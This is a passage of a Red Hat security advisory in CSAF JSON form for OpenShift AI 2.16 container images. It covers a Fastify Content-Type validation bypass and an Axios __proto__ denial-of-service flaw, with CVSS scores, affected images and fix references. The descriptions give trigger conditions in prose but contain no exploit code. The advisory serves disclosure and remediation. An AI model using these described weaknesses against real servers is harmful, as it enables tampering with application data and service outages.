"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2436560"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Fastify, a web framework for Node.js. A remote attacker can exploit a validation bypass vulnerability by appending a tab character followed by arbitrary content to the Content-Type header. This circumvents the request body validation schemas, allowing the server to process the body as the original content type without proper validation. This could lead to unexpected data processing and potential integrity impact.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Fastify: Fastify: Validation bypass due to malformed Content-Type header leading to integrity impact",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This IMPORTANT vulnerability in Fastify, a Node.js web framework, allows remote attackers to bypass request body validation by manipulating the Content-Type header. This can lead to unexpected data processing and integrity issues in applications. Red Hat products such as Red Hat Enterprise Linux AI, Red Hat OpenShift AI, and Red Hat OpenShift Dev Spaces are affected.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25223"
},
{
"category": "external",
"summary": "RHBZ#2436560",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2436560"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25223",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25223"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25223",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25223"
},
{
"category": "external",
"summary": "https://fastify.dev/docs/latest/Reference/Validation-and-Serialization",
"url": "https://fastify.dev/docs/latest/Reference/Validation-and-Serialization"
},
{
"category": "external",
"summary": "https://github.com/fastify/fastify/blob/759e9787b5669abf953068e42a17bffba7521348/lib/content-type-parser.js#L125",
"url": "https://github.com/fastify/fastify/blob/759e9787b5669abf953068e42a17bffba7521348/lib/content-type-parser.js#L125"
},
{
"category": "external",
"summary": "https://github.com/fastify/fastify/blob/759e9787b5669abf953068e42a17bffba7521348/lib/validation.js#L272",
"url": "https://github.com/fastify/fastify/blob/759e9787b5669abf953068e42a17bffba7521348/lib/validation.js#L272"
},
{
"category": "external",
"summary": "https://github.com/fastify/fastify/commit/32d7b6add39ddf082d92579a58bea7018c5ac821",
"url": "https://github.com/fastify/fastify/commit/32d7b6add39ddf082d92579a58bea7018c5ac821"
},
{
"category": "external",
"summary": "https://github.com/fastify/fastify/security/advisories/GHSA-jx2c-rxcm-jvmq",
"url": "https://github.com/fastify/fastify/security/advisories/GHSA-jx2c-rxcm-jvmq"
},
{
"category": "external",
"summary": "https://hackerone.com/reports/3464114",
"url": "https://hackerone.com/reports/3464114"
}
],
"release_date": "2026-02-03T21:21:40.268000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-25T12:32:51+00:00",
"details": "For Red Hat OpenShift AI 2.16.4 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5807"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "Fastify: Fastify: Validation bypass due to malformed Content-Type header leading to integrity impact"
},
{
"cve": "CVE-2026-25639",
"cwe": {
"id": "CWE-1287",
"name": "Improper Validation of Specified Type of Input"
},
"discovery_date": "2026-02-09T21:00:49.280114+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438237"
}
],
"notes": [
{
"category": "description",
"text": "A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
